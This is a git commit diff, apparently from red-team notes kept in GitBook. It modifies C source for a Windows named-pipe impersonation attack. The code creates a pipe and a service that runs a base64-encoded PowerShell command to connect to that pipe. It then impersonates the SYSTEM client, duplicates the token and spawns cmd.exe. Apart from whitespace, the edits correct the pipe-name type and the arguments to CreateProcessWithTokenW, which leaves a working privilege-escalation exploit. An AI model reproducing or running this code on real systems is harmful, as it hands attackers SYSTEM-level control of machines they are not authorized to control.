GitBook: [master] one page modified
This commit is contained in:
parent
bcb25897ff
commit
65a0afb2a4
@ -29,16 +29,16 @@ int ServiceGo(void) {
|
||||
}
|
||||
|
||||
// create Piper service
|
||||
scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
|
||||
SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL,
|
||||
"C:\\Windows\\\System32\\cmd.exe /rpowershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==",
|
||||
NULL, NULL, NULL, NULL, NULL);
|
||||
scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
|
||||
SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL,
|
||||
"C:\\Windows\\\System32\\cmd.exe /rpowershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==",
|
||||
NULL, NULL, NULL, NULL, NULL);
|
||||
|
||||
if (scService == NULL) {
|
||||
//printf("[!] CreateServiceA() failed: [%d]\n", GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
|
||||
// launch it
|
||||
StartService(scService, 0, NULL);
|
||||
|
||||
@ -47,12 +47,12 @@ int ServiceGo(void) {
|
||||
DeleteService(scService);
|
||||
|
||||
CloseServiceHandle(scService);
|
||||
CloseServiceHandle(scManager);
|
||||
CloseServiceHandle(scManager);
|
||||
}
|
||||
|
||||
int main() {
|
||||
|
||||
LPCWSTR sPipeName = "\\\\.\\pipe\\piper";
|
||||
LPCSTR sPipeName = "\\\\.\\pipe\\piper";
|
||||
HANDLE hSrvPipe;
|
||||
HANDLE th;
|
||||
BOOL bPipeConn;
|
||||
@ -65,34 +65,34 @@ int main() {
|
||||
PROCESS_INFORMATION pi;
|
||||
|
||||
// open pipe
|
||||
hSrvPipe = CreateNamedPipeA(sPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT,
|
||||
PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL);
|
||||
|
||||
hSrvPipe = CreateNamedPipeA(sPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT,
|
||||
PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL);
|
||||
|
||||
// create and run service
|
||||
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) ServiceGo, NULL, 0, 0);
|
||||
|
||||
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ServiceGo, NULL, 0, 0);
|
||||
|
||||
// wait for the connection from the service
|
||||
bPipeConn = ConnectNamedPipe(hSrvPipe, NULL);
|
||||
if (bPipeConn) {
|
||||
ReadFile(hSrvPipe, &pPipeBuf, MESSAGE_SIZE, &dBRead, NULL);
|
||||
|
||||
|
||||
// impersonate the service (SYSTEM)
|
||||
if (ImpersonateNamedPipeClient(hSrvPipe) == 0) {
|
||||
return -1;
|
||||
}
|
||||
|
||||
|
||||
// wait for the service to cleanup
|
||||
WaitForSingleObject(th, INFINITE);
|
||||
|
||||
|
||||
// get a handle to impersonated token
|
||||
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hImpToken)) {
|
||||
return -2;
|
||||
}
|
||||
return -2;
|
||||
}
|
||||
|
||||
// create new primary token for new process
|
||||
if (!DuplicateTokenEx(hImpToken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation,
|
||||
TokenPrimary, &hNewToken)) {
|
||||
return -4;
|
||||
TokenPrimary, &hNewToken)) {
|
||||
return -4;
|
||||
}
|
||||
|
||||
//Sleep(20000);
|
||||
@ -100,14 +100,14 @@ int main() {
|
||||
ZeroMemory(&si, sizeof(si));
|
||||
si.cb = sizeof(si);
|
||||
ZeroMemory(&pi, sizeof(pi));
|
||||
if (!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, NULL, L"cmd.exe",
|
||||
NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi)) {
|
||||
if (!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, L"cmd.exe", NULL,
|
||||
NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi)) {
|
||||
return -5;
|
||||
}
|
||||
|
||||
|
||||
// revert back to original security context
|
||||
RevertToSelf();
|
||||
|
||||
|
||||
}
|
||||
|
||||
return 0;
|
||||
|
Loading…
Reference in New Issue
Block a user